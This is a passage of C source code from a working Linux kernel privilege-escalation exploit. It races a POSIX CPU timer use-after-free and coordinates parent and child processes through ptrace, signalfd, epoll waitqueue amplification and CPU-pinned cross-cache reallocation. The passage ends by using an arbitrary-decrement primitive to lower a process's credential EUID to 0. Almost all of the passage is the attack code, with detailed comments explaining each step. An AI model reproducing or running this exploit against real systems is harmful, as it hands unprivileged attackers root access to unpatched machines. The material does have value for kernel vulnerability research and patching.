        realloc_evt._sigev_un._tid = (pid_t)syscall(SYS_gettid);
        // realloc_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL; // For debugging
        
        // Create SIGUSR2 sfd, and block SIGUSR2 and SIGRTMIN+1 and SIGRTMIN+2 on this process.
        sigset_t block_mask;
        sigemptyset(&block_mask);
        sigaddset(&block_mask, SIGUSR2);
        int sigusr2_sfd = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));\
        sigaddset(&block_mask, SIGRTMIN+1);
        sigaddset(&block_mask, SIGRTMIN+2);
        SYSCHK(sigprocmask(SIG_BLOCK, &block_mask, NULL));
        
        // itimerspec that fires the time immediately when used with `TIMER_ABSTIME`.
        struct itimerspec fire_ts = {0};
        fire_ts.it_value.tv_nsec = 1;

        int parent_settime_delay = PARENT_SETTIME_DELAY_US;
        // int parent_settime_delay = 200 * 1000; // KERNEL PATCH: 200ms delay

        // Prepare the preallocs for cross-cache for parent process
        // NOTE: Must be on CPU 3!
        pin_on_cpu(3);
        sigqueue_crosscache_preallocs();
        pin_on_cpu(0);

        // On a different CPU to the cross-cache CPUs, enqueue a `SIGRTMIN+2` signal.
        // This is used later to leak the task pending list address.
        pid_t my_pid = (pid_t)syscall(SYS_gettid);
        SYSCHK(syscall(__NR_tkill, my_pid, SIGRTMIN+2));

        while (1) {
            // Initially pin to CPU 0
            pin_on_cpu(0);

            // Reset `realloc_timer` on each try.
            realloc_timer = (void *) -1;

            // Receive child process's RACER thread's TID for reaping later
            SYSCHK(read(exploit_child_to_parent[0], &racer_tid, sizeof(pid_t))); // sync 1

            // Attach to the RACER thread and continue it
            SYSCHK(ptrace(PTRACE_ATTACH, racer_tid, NULL, NULL));
            SYSCHK(waitpid(racer_tid, NULL, __WALL));
            SYSCHK(ptrace(PTRACE_CONT, racer_tid, NULL, NULL));

            // Signal to child that we attached and continued
            SYSCHK(write(exploit_parent_to_child[1], &m, 1)); // sync 2

            // Reap the RACER thread.
            //
            // At this point, this should block while the RACER thread is consuming CPU
            // time. There are three possible outcomes:
            //
            // 1. If the RACER thread exits and enters `handle_posix_cpu_timers()` AFTER
            //    `do_exit() -> exit_notify()` has woken us up. `waitpid()` will reap the
            //    RACER thread at that point and allow the timer to be freed.
            //
            // 2. If the RACER thread fires timers too early, then we'll just wake up
            //    after the race window is completely gone.
            //
            // 3. If the RACER thread never fires the timers, we'll also return after the
            //    race window is completely gone.
            SYSCHK(waitpid(racer_tid, NULL, __WALL));

            // Assume we won the race for now. Only the child process can tell us for sure.
            // Child process will be waiting for us to let it know after `waitpid()` returns.
            SYSCHK(write(exploit_parent_to_child[1], &m, 1)); // sync 3

            // Child process `free_func()` thread lets us know when it freed the UAF timer so
            // we can re-allocate it.
            //
            // Ensure to switch to CPU 3 before re-allocating.
            pin_on_cpu(3);
            SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 4

            // Either `free_func()` sends us SUCCESS, or the child process main thread sends us FAIL.
            // In the success case, we are potentially in the race window with a freed timer.
            if (m == SUCCESS_CHAR) {
                // At this point, we know that the timers fired, because the SUCCESS_STR is only
                // sent by the `free_func()` thread.
                //
                // But we don't know if we won the 1st race or not.
                //
                // In any case, we re-allocate the UAF timer now, because it prevents hitting the
                // `BUG_ON` in `send_sigqueue()` if the timer was actually freed.
                SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &realloc_evt, &realloc_timer));
                
                // If we assume we won the race, now `realloc_timer->sigq` is the same as `uaf_timer->sigq`, 
                // and `uaf_timer` is currently being handled by `handle_posix_cpu_timers()` via RACER thread.
                //
                // We want to wait a certain amount of time to let the RACER thread enter `send_sigqueue()`
                // with the `uaf_timer->sigq`, and go past the `!list_empty()` check.
                usleep(parent_settime_delay);

                // Once past the `!list_empty()` check in `send_sigqueue()`, 
                // the `signalfd_notify()` is going to extend the 2nd race window for us.
                //
                // In that 2nd race window, use `timer_settime()` to fire the realloc timer immediately
                // by setting the time in the past, and using `TIMER_ABSTIME`.
                //
                // If we time it just right, the RACER thread's `send_sigqueue()` will be past the
                // `!list_empty()` check, and we'll also get past the check before either thread is
                // able to insert the `sigqueue` into the target task's pending list.
                //
                // At this point, if all of it lined up, this same `sigqueue` will be inserted into both
                // parent and child's pending lists at the same time.
                SYSCHK(timer_settime(realloc_timer, TIMER_ABSTIME, &fire_ts, NULL));

                // The child process will tell us whether it received SIGUSR2 or not. This
                // is how we know whether we won the first race or not.
                SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 5

                // If the child tells us that it didn't receive SIGUSR2, then there are two
                // situations:
                //
                // 1. We lost the 1st race, so the child received NUM_TIMERS+1 SIGUSR1 signals. This
                //    means the child never could have seen the SIGUSR2 signal.
                // 2. We won the 1st race, but the didn't win the 2nd race. This means the child could
                //    have seen the SIGUSR2 signal, but since it says it didn't, it means our timer
                //    fired too early.
                //
                // In the 2nd case, the signal's `overrun` field will be set to 1.
                if (m == FAIL_CHAR) {
                    // NOTE: no need to poll here, because we'll have the signal here for sure.
                    // After all, we fired it didn't we? :p
                    struct signalfd_siginfo si;
                    SYSCHK(read(sigusr2_sfd, &si, sizeof(si)));

                    // Check for the 2nd case above, did the child receive the SIGUSR2 signal
                    // after it was already queued into our pending list?
                    if (si.ssi_overrun > 0) {
                        // We queued the SIGUSR2 too early into our pending list, so
                        // increase the `timer_settime()` delay for next time.
                        printf("\t[+] Parent raced too early, readjusting...\n");
                        parent_settime_delay += PARENT_SETTIME_DELAY_US_DELTA;
                    } else {
                        // 1st case above, reallocation just failed completely. We
                        // don't need to do anything.
                    }
                } else {
                    // The child was able to observe the SIGUSR2 signal, which means we won the
                    // first race and successfully reallocated the `sigqueue` of the UAF timer.
                    //
                    // Now, since the child saw the SIGUSR2 signal, we have to check to see if
                    // we see the signal too (i.e double insertion check).
                    struct pollfd pfd = { 
                        .fd = sigusr2_sfd,
                        .events = POLLIN
                    };

                    int ret = poll(&pfd, 1, 1);

                    if (ret < 0) {
                        // Some unknown error, pause to debug it.
                        perror("Exploit success path poll");
                        getchar();
                    } else if (pfd.revents & POLLIN) {
                        // We got the SIGUSR2 signal too, which means we won both races.
                        // First, let the child know that we succeeded.
                        SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // sync 6.SUCCESS

                        // SUCCESS_COMMENT:
                        // UAF sigqueue is now in both process's pending list, but we don't
                        // know which list the UAF sigqueue's list is pointing to. 
                        // 
                        // This matters because when we dequeue this signal from the 
                        // pending list, two things will happen:
                        //
                        // 1. The sigqueue will be removed from the list that it *thinks*
                        //    it's in.
                        // 2. The other list will still point to the `sigqueue`, but the
                        //    `sigqueue` itself is considered "empty" and thus cannot ever
                        //    be removed from that other list.
                        //
                        // We need to know which list the sigqueue *thinks* it's in, so we can
                        // continuously dequeue it later as much as we want through the other
                        // list (after all, that's the only primitive we have, since only the 
                        // task pending list has a reference to this UAF sigqueue).
                        //
                        // To figure this out, first delete the timer, so that dequeueing the
                        // UAF sigqueue later will free it.
                        SYSCHK(timer_delete(realloc_timer));
                        
                        // Now, dequeue the UAF sigqueue. It doesn't matter that we dequeue
                        // it from the parent process, because the UAF sigqueue's own list
                        // pointers determines which list it's going to be removed from.
                        struct signalfd_siginfo si;
                        SYSCHK(read(sigusr2_sfd, &si, sizeof(si)));

                        // At this point, two cases:
                        //
                        // 1. If the UAF sigqueue's list pointers pointed to the parent's list,
                        //    then polling here should timeout and not return any pending
                        //    signals (as we just removed it).
                        // 2. If it pointed to the child's list, polling here will still
                        //    return the signal, because the parent still points to it.
                        int ret = poll(&pfd, 1, 1);

                        if (ret > 0 && (pfd.revents & POLLIN)) {
                            // We have the infinitely looping sigqueue in our pending list.
                            // Let the child know via the fail string because we won.
                            SYSCHK(write(exploit_parent_to_child[1], FAIL_STR, 1)); // sync 7.FAIL

                            // Mark this parent as being the owner of the UAF sigqueue.
                            parent_owns_uaf_sigqueue = 1;
                            buggy_pid = (pid_t)syscall(SYS_gettid);

                            printf("\t[+] Freed UAF sigqueue in parent process pid %d\n", buggy_pid);

                            // Initiate stage 2
                            second_stage_exploit();

                            SYSCHK(write(exploit_parent_to_child[1], FAIL_STR, 1)); // sync 8.FAIL
                        } else if (!ret) {
                            // Timeout, means the `sigqueue` is in the child's list.
                            // Let the child know via the success string.
                            SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // sync 7.SUCCESS

                            // Child will let us know when to continue.
                            SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 1

                            second_stage_exploit();
                        } else {
                            // unknown error, just pause to debug it
                            perror("Exploit success path poll 2 unknown error");
                            getchar();
                        }
                    } else if (!ret) {
                        // Timeout case, we didn't receive the SIGUSR2 signal, but the
                        // child told us that it did. This means we won the first race
                        // and successfully reallocated over the UAF timer's sigqueue,
                        // but our `timer_settime()` fired too late.
                        //
                        // Adjust `start_sleep_time` accordingly to run `timer_settime()`
                        // earlier next time.
                        printf("\t[+] Parent raced too late, readjusting...\n");
                        parent_settime_delay -= PARENT_SETTIME_DELAY_US_DELTA;

                        // Let the child know that we failed.
                        SYSCHK(write(exploit_parent_to_child[1], FAIL_STR, 1)); // sync 6.FAIL
                    }
                }
            }

            // Let the child process delete and free the timer, and
            // all threads before retrying.
            SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 9

            // Free `realloc_timer` if it was ever allocated.
            if (realloc_timer != (void *) -1) {
                timer_delete(realloc_timer);
            }
        }
        
        // UNREACHABLE CODE:
        // Wait for child to exit before exiting
        waitpid(pid, NULL, __WALL);
        close(exploit_child_to_parent[0]);
        close(exploit_parent_to_child[1]);
        exit(0);
    } else {
        // exploit child process
        pin_on_cpu(1);
        close(exploit_child_to_parent[0]);
        close(exploit_parent_to_child[1]);

        exploit_child_pid = (pid_t)syscall(SYS_gettid);

        // Create signalfds, one each for SIGUSR1, SIGUSR2, SIGRTMIN+1, and SIGRTMIN+2.
        sigset_t block_mask;
        sigemptyset(&block_mask);
        sigaddset(&block_mask, SIGUSR1);
        sigusr1_sfds[0] = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));
        sigemptyset(&block_mask);
        sigaddset(&block_mask, SIGUSR2);
        sigusr2_sfds[0] = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));
        sigemptyset(&block_mask);
        sigaddset(&block_mask, SIGRTMIN+1);
        int sigrt1_sfd = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));
        sigemptyset(&block_mask);
        sigaddset(&block_mask, SIGRTMIN+2);
        int sigrt2_sfd = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));
        
        // Block all the above signals as well for later
        sigemptyset(&block_mask);
        sigaddset(&block_mask, SIGUSR1);
        sigaddset(&block_mask, SIGUSR2);
        sigaddset(&block_mask, SIGRTMIN+1);
        sigaddset(&block_mask, SIGRTMIN+2);
        sigprocmask(SIG_BLOCK, &block_mask, NULL);

        // Duplicate the SIGUSR1 and SIGUSR2 sfds, and set up epoll
        // watchers on them. In total, 50,000 waitqueue entries will
        // be created.
        //
        // Credit: Jann Horn:
        // https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html
        int epoll_fds[EPOLL_COUNT];

        for (int i = 0; i < EPOLL_COUNT; i++) {
            epoll_fds[i] = SYSCHK(epoll_create1(EPOLL_CLOEXEC));
        }

        // Duplicate sfds, index 0 is the original
        for (int i = 1; i < SFD_DUP_COUNT; i++) {
            sigusr1_sfds[i] = SYSCHK(dup(sigusr1_sfds[0]));
            sigusr2_sfds[i] = SYSCHK(dup(sigusr2_sfds[0]));
        }

        // Setup epoll watchers now
        struct epoll_event ev = {0};
        ev.events = EPOLLIN;

        for (int i = 0; i < EPOLL_COUNT; i++) {
            for (int j = 0; j < SFD_DUP_COUNT; j++) {
                ev.data.fd = sigusr1_sfds[j];
                SYSCHK(epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, sigusr1_sfds[j], &ev));
                ev.data.fd = sigusr2_sfds[j];
                SYSCHK(epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, sigusr2_sfds[j], &ev));
            }
        }

        // 50,000 waitqueue entries now setup on the signalfds for 
        // `signalfd_notify()` in the kernel later.
        prctl(PR_SET_NAME, "EXPLOIT_CHILD");
        pthread_barrier_init(&barrier, NULL, 2);

        // Thread that will handle freeing the UAF timer.
        pthread_t free_timer_thread;

        // On a different CPU to the cross-cache CPUs, enqueue a `SIGRTMIN+2` signal.
        // This is used later to leak the task pending list address.
        pid_t my_pid = (pid_t)syscall(SYS_gettid);
        SYSCHK(syscall(__NR_tkill, my_pid, SIGRTMIN+2));

        printf("[+] Stage 1 - Attempting to win the race...\n");

        while (1) {
            // printf("Try %d\n", race_retry_count+1);

            // Reset `uaf_timer` before every attempt.
            uaf_timer = (void *) -1;

            // Drain signalfds as they could have left over signals from
            // the previous try.
            struct signalfd_siginfo si;
            drain_signalfd(sigusr1_sfds[0]);
            drain_signalfd(sigusr2_sfds[0]);

            // Create the FREE_TIMER and RACER threads
            SYSCHK(pthread_create(&race_thread, NULL, (void*)race_func, NULL));
            SYSCHK(pthread_create(&free_timer_thread, NULL, (void*)free_func, NULL));

            // Parent process writes to us when attached and continued, use
            // a barrier to continue the RACER thread now
            SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 2
            pthread_barrier_wait(&barrier); // barrier 1

            // Wait for timers to be created by RACER thread
            pthread_barrier_wait(&barrier); // barrier 2

            // Arm the timers now, ensuring the first 18 are before the
            // UAF timer
            struct itimerspec ts = {
                .it_interval = {0, 0},
                .it_value = {
                    .tv_sec = 0,
                    .tv_nsec = ONE_MS_NS - 1,
                },
            };
            
            for (int i = 0; i < NUM_TIMERS; i++) {
                SYSCHK(timer_settime(stall_timers[i], 0, &ts, NULL));
            }
            
            // Arm UAF timer as the latest one
            ts.it_value.tv_nsec = ONE_MS_NS;
            SYSCHK(timer_settime(uaf_timer, 0, &ts, NULL));
            
            // Now, let RACER thread continue
            pthread_barrier_wait(&barrier); // barrier 3
            
            // Parent exploit process tells us after `waitpid()` returns.
            SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 3

            // Wait up to 100ms for the any signals to be received
            //
            // NOTE: Depending on how long the race window is, this timeout
            //       may need to be longer. 
            // 
            //       In my case, the race window is 24-30ms long, so 100ms is 
            //       plenty.
            struct pollfd pfds[2] = { 
                { .fd = sigusr1_sfds[0], .events = POLLIN },
                { .fd = sigusr2_sfds[0], .events = POLLIN }, 
            };

            int sigusr1_count = 0;
            int race_won = 0;

            // This is unused normally, but can be used with a kernel
            // patch. See below.
            int poll_timeout = 100;

            // Poll for SIGUSR1 and SIGUSR2.
            for (;;) {
                int ret = poll(pfds, 2, poll_timeout);
                if (!ret) { 
                    // Timeout case means one of two things:
                    //
                    // 1. No timers were fired at all.
                    // 2. Timers were fired, but the 2nd race was lost, so
                    //    we didn't see the reallocated timer's SIGUSR2 signal.
                    //
                    // In the first case, `sigusr1_count` will be 0, use that
                    // to know that we should cancel the `free_timer_thread`,
                    // as otherwise it will be running and waiting forever for
                    // a signal.
                    if (!sigusr1_count) {
                        pthread_cancel(free_timer_thread);
                    }

                    // In the 2nd case, we'll hit this timeout only if the parent
                    // process queued the SIGUSR2 signal on itself before we could
                    // enter the 2nd race window (so we failed the `!list_empty()` check).
                    //
                    // This basically means we didn't receive the SIGUSR2 signal, but
                    // also received one less SIGUSR1 signal than we'd expect (because the
                    // UAF timer that was supposed to send us the last SIGUSR1 was reallocated).
                    // 
                    // In this case, the `free_func()` thread will have already exited. We
                    // just let the parent know.
                    //
                    // Note: for the first case above, we also let the parent know. That's why
                    //       this write is marked with sync 4.FAIL and sync 5.FAIL, since it
                    //       handles two separate failure scenarios.
                    SYSCHK(write(exploit_child_to_parent[1], FAIL_STR, 1)); // sync 4.FAIL, 5.FAIL
                    break;
                }
                else if (ret > 0 && (pfds[0].revents & POLLIN)) {
                    // We got SIGUSR1! Timers fired.
                    //
                    // Wait for the `free_func()` thread to handle the SIGUSR1
                    // signal first before doing anything the first time.
                    if (!sigusr1_count) pthread_barrier_wait(&barrier); // barrier 4

                    // KERNEL PATCH: change timeout to 1s after SIGUSR1 seen, guarantees
                    //               that we win the second race.
                    // poll_timeout = 1000;

                    // Got the SIGUSR1 signal, drain it and increase count
                    sigusr1_count += drain_signalfd(sigusr1_sfds[0]);
                    if (sigusr1_count >= NUM_TIMERS+1) { 
                        // Receiving 19 SIGUSR1 signals means the first race failed,
                        // because the parent process failed to reallocate and change
                        // the UAF timer's signal to SIGUSR2.
                        //
                        // The parent process will be waiting for us to let it know
                        // whether the reallocated timer was able to send us the
                        // SIGUSR2 or not. In this case, we failed.
                        //
                        // Let the parent know and exit this poll loop.
                        SYSCHK(write(exploit_child_to_parent[1], FAIL_STR, 1)); // sync 5.FAIL
                        break;
                    }
                } else if (ret > 0 && (pfds[1].revents & POLLIN)) {
                    // We got SIGUSR2! Race is potentially won, so let's check.
                    // Let parent process know to check for SIGUSR2 signal
                    SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // sync 5.SUCCESS
                    SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 6

                    if (m == SUCCESS_CHAR) {
                        // For an explanation of the below steps, ctrl+f for
                        // "SUCCESS_COMMENT:" in this exploit. It explains
                        // how to figure out which list the `sigqueue's` next
                        // and prev pointers point to (i.e child or parent process's
                        // pending list).
                        SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 7

                        // Parent tells us whether we have the UAF sigqueue in our pending list or not.
                        if (m == SUCCESS_CHAR) {
                            // We have the signal in our list.
                            //
                            // This is an extremely rare situation, as the race window for this
                            // to occur is so incredibly small.
                            //
                            // If you see "Freed sigqueue in child process" and the exploit fails,
                            // please restart :) because I have never ran into this situation, so
                            // the exploit is untested from here on out.
                            parent_owns_uaf_sigqueue = 0;
                            buggy_pid = (pid_t)syscall(SYS_gettid);

                            printf("\t[+] Freed UAF sigqueue in child process pid %d\n", buggy_pid);
                            printf("\t[+] NOTE: The exploit is untested in this state. If you reach here and the exploit fails, please retry :)\n");

                            // Tell the parent to continue the exploit now.
                            SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 1

                            // Parent will tell us to dequeue the SIGRTMIN+2 signal.
                            SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 2

                            // Dequeueing this signal will put the pointer of our task struct's pending list
                            // into the ->prev pointer of the UAF sigqueue.
                            SYSCHK(read(sigrt2_sfd, &si, sizeof(si)));

                            // Let the parent know it can continue
                            SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 3

                            // Wait for the parent to ask us to dequeue the SIGUSR2 signal now.
                            SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 4

                            // Now dequeue the UAF sigqueue's signal to write it's own pointers back into itself.
                            // This will happen because of the `list_del_init()` in `collect_signal()`.
                            //
                            // The parent does this on CPU 2, so we do the same here, and switch back
                            // afterwards.
                            //
                            // NOTE: After this, SIGUSR2 is removed from the task's signal mask, but
                            //       SIGRTMIN+1 stays.
                            pin_on_cpu(2);
                            SYSCHK(read(sigusr2_sfds[0], &si, sizeof(si)));
                            pin_on_cpu(1);

                            // Let the parent know it can continue
                            SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 5

                            // Parent will let us know when to dequeue the other sigqueue
                            SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 6

                            // Dequeue the SIGRTMIN+1 signal. This MUST be done on CPU 2 for the
                            // second cross-cache to work.
                            pin_on_cpu(2);
                            SYSCHK(read(sigrt1_sfd, &si, sizeof(si)));
                            pin_on_cpu(1);

                            // Let the parent know it can continue
                            SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 7

                            // Parent will let us know when to use the arbitrary decrement primitive.
                            SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 8

                            // Arbitrary decrement time! Decrement target cred's EUID to 0. This process
                            // will have the same UID as the target cred, so we can use that to know
                            // how many times to decrement.
                            for (int i = 0; i < getuid(); i++) {
                                SYSCHK(read(sigrt1_sfd, &si, sizeof(si)));
                            }

                            // Exploit is now finished, let the parent know and block forever.
                            SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 9

                            // This will block forever, parent won't write to us anymore.
                            SYSCHK(read(exploit_parent_to_child[0], &m, 1));
                        } else {
                            // We don't have the signal in our list, parent can
                            // continue the exploit now.
                            //
                            // This will block forever, parent won't write to us anymore.
                            SYSCHK(read(exploit_parent_to_child[0], &m, 1));
                        }
                    } else {
                        break; // Failed
                    }
                } else {
                    // error, just pause to debug it
                    printf("poll error in main\n");
                    getchar();
                }
            }

            // If we got here, our current attempt failed. Update `syscall_loop_times`.
            syscall_loop_times++;
            syscall_loop_times %= SYSCALL_LOOP_TIMES_MAX+1;
            race_retry_count++;

            // Free stall timers
            for (int i = 0; i < NUM_TIMERS; i++) {
                timer_delete(stall_timers[i]);
            }

            // Free UAF timer in case it didn't get deleted.
            if (uaf_timer != (void *) -1) {
                timer_delete(uaf_timer);
            }

            // Either the `free_timer_thread` got a signal and exited
            // normally, or it didn't get a signal and we cancelled
            // it in the poll code above. Either way, we can join it.
            SYSCHK(pthread_join(free_timer_thread, NULL));

            // Signal to parent to try again
            SYSCHK(write(exploit_child_to_parent[1], "t", 1)); // sync 9
        }
        
        // UNREACHABLE CODE:
        // Signal to parent to exit
        SYSCHK(write(exploit_child_to_parent[1], "t", 1));

        // Wait for parent to exit
        close(exploit_child_to_parent[1]);
        close(exploit_parent_to_child[0]);

        for (int i = 0; i < SFD_DUP_COUNT; i++) {
            close(sigusr2_sfds[i]);
            close(sigusr1_sfds[i]);
        }
        exit(0);
    }
}